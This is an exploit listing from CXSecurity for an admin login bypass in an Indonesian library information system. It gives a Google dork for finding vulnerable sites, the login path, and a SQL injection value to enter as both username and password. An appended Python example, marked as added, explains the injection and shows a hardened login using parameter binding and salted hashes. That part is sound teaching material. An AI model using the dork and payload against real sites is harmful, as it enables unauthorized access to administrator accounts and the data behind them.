Sistem Informasi Perpustakaan Admin Login Bypass - CXSecurity.com

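Vulnerability ID 1209566 Vulnerability type
Published 2018-06-10 Updated 2018-06-10
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2018060088
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit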
***************************************************
# Exploit Title: Sistem Informasi Perpustakaan Admin Login Bypass
# Google Dork: inurl:/depan/cari_buku
# Exploit: /apps/login
# Date: 09/06/2018
# Author: 0N3R1D3R
# Team: Error Violence
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Open target
[+] Give target with exploit ( /apps/login )
[+] Enter the username and password as follows:
[+] Username: '=''or'
[+] Password: '=''or'
[+] Vuln? You are redirected to the dashboard
***************************************************
[+] Demo Site
***************************************************
Thanks To Error Violence
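
Added example, not part of the original advisory and not the application's own code: the advisory does not show the login query, so this assumes the common pattern of pasting both form fields into the SQL text. It shows why the quoted value changes the structure of such a query, next to a login check that binds the username as a parameter and verifies a salted hash. The table name, column names and sample account are hypothetical.

```python
import hashlib, hmac, os, re, sqlite3

PAYLOAD = "'=''or'"  # value the advisory enters as username and as password

def build_concatenated(username, password):
    # ASSUMED vulnerable pattern (not shown on the page): input pasted into SQL text.
    return ("SELECT id FROM admin WHERE username='" + username +
            "' AND password='" + password + "'")

def skeleton(sql):
    # Replace every '...' literal ('' inside a literal is an escaped quote) with ?
    # so that what remains is the part the database parses as SQL syntax.
    return re.sub(r"'(?:[^']|'')*'", "?", sql)

def hash_pw(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    # Constructed sample data: one admin account in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, "
               "username TEXT UNIQUE, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO admin (username, salt, pw_hash) VALUES (?, ?, ?)",
               ("admin", salt, hash_pw("correct horse", salt)))
    return db

def login(db, username, password):
    # Hardened form: the username is bound as data, never parsed as SQL, and the
    # password is verified in application code against a salted hash.
    row = db.execute("SELECT salt, pw_hash FROM admin WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(hash_pw(password, row[0]), row[1])

if __name__ == "__main__":
    print(skeleton(build_concatenated("admin", "secret")))
    print(skeleton(build_concatenated(PAYLOAD, PAYLOAD)))
    db = make_db()
    print(login(db, "admin", "correct horse"), login(db, PAYLOAD, PAYLOAD))
```

With ordinary input the skeleton has two placeholders joined by AND; with the advisory's value an `or` operator and extra comparisons appear outside any literal, which is the condition parameter binding removes.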